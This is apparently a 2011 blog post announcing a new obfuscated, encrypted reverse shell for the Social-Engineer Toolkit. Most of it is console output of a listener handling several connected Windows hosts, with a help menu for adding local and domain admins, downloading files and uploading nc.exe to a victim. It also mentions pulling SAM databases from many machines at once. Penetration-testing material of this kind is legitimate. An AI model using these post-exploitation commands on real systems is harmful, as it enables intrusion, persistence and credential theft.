March 03, 2011
SET v1.3 Interactive Command Shell New Addition
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
While I have been working frantically on The Social-Engineer Toolkit (SET) v1.3, I wanted to give a little teaser on a new addition that I've been working on. I have to say this is probably one of the hardest tasks I've built into SET and coded in Python. Building a raw multi-threaded socket handler that can distinguish between inter-communicating threads and handling them in different channels was a bit of a rough task since Python threads are pretty immature overall. Anyways, the new addition is going to be a purely python driven SET based listener and shell that handles a slew of tasks. Good news is its heavily obfuscated, will leverage encrypted communications, and act as a reverse shell. My thoughts on this is having a purely SET driven interactive payload instead of leveraging Metasploit based payloads. While the payload support within SET will still include Metasploit, this will allow additional avenues and capabilities to be put into SET and grow it and become more independent over time. Here is a small teaser of the shell. I don't have a release date yet, I'm hoping by end of month.
Something to add is that the socket storage is done in memory, so theoretically I can add the ability to perform tasks on each shell at once. So if you wanted to download the SAM database on 30 systems at once, this will be possible instantaneously.
The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:80
[fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Connection received from: 172.16.32.131
[*] Establishing encrypted tunnel...
*** Pick the number of the shell you want ***
1: 172.16.32.131
Enter your numeric choice: 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set>
set>
set>
[*] Connection received from: 172.16.32.132
[*] Connection received from: 172.16.32.133
[*] Connection received from: 172.16.32.134
set> shell
[*] Dropping into a shell. Enter your shell commands below.
set/command_shell>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.32.131
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.32.2
set/command_shell>quit
set> quit
[*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell.
*** Pick the number of the shell you want ***
1: 172.16.32.131
2: 172.16.32.132
3: 172.16.32.133
4: 172.16.32.134
Enter your numeric choice: 3
set> [*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set> shell
set> [*] Dropping into a shell. Enter your shell commands below.
set/command_shell>ipconfig
set>
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.32.133
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.32.2
set> ?
Welcome to the Social-Engineer Toolkit Help Menu.
Enter the following commands for usage:
Command: shell
Explanation: drop into a command shell
Example: shell
Command: localadmin
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!
Command: domainadmin
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!
Command: download_file
Explanation: downloads a file locally to the SET root directory.
Example: download_file C:boot.ini
Command upload_file
Explanation: uploads a file to the victim system
Example: upload_file /root/nc.exe C:nc.exe
set/command_shell> quit
set> localadmin testing123 asfsdfdsfdsfds
set>
[*] Attempting to add a user account with administrative permissions.
[*] User add completed. Check the system to ensure it worked correctly.
set>[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]